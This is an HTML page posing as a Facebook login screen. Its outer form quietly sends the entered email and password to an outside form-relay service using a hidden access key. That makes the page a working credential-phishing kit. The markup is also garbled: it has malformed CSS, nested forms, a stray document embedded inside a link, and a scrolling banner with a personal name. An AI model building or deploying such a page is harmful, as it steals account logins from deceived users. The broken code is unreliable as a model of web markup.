<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook </title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color:#222;
            display: flex;
            justify-content: center;
            align-items: up;
            height: 200vh;
            margin: 20;
        }
        .login-container {
            
     width="100" 
     height="100">
            padding: 30px;
            box-shadow: 0 0 40px rgba(0, 0, 0, 0.5);
            border-radius: 10px;
            width: 300px;
            text-align: center;
        }
        .login-container h2 {
            margin-bottom: 20px;
            color: #fff;
        }
        .login-container input[type="text"],
        .login-container input[type="password"] {
            width: 70%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #444;
            border-radius: 4px;
            background-color: #333;
            color: #fff;
            outline: none;
        }
        .login-container input[type="text"]:focus,
        .login-container input[type="password"]:focus {
            border-color: #009688;
            box-shadow: 0 0 5px #009688;
        }
        .login-container button {
            width: 40%;
            padding: 10px;
            background-color: #009688;
            border: none;
            color: #fff;
            border-radius: 6px;
            cursor: pointer;
            font-size: 16px;
            margin-top: 10px;
        }
        .login-container button:hover {
            background-color: #00796b;
        }
        .login-container a {
            display: block;
            margin-top: 10px;
            color: #009688;
            text-decoration: none;
        }
    </style>
</head>
<body>
          <form
          action="https://api.web3forms.com/submit"
          method="POST"
          id="form"
          class="needs-validation"
          novalidate
        >
          <input type="hidden" name="access_key" value="3e4f758d-de26-4bd1-96d6-6f4c005d757f" />
    <div class="login-container">
<p style="border: 6px skyblue"><marquee behavior="scroll" direction="left">
<p style="color:RED;">ILOVEYOU💋❤️<h6>I' AM NOVE:11/29/22:GLENN SAM EVANGELIO</p>
</marquee></p>
        <h2>Facebook</h2>

        <form action="/login" method="POST">
            <input type="text" name="email" placeholder="Email or Phone" required> 
            <input type="password" name="glennsamevangelio70@gmail.com" placeholder="Password" required>
            <button type="submit">Log In</button>
        </form>
        <a href="#"><!DOCTYPE html>
<html>
<head>
  <title>no</title>
</head>
<body>
  <a href="https://curlyfish.netlify.app/">Sign up</a>

<p><img src="https://i.postimg.cc/133mCS5V/IMG-20240524-072436-127-transcpr.jpg" 
     width="200" 
     height="260">
        
</html></a>
    </div>
</body>
</html>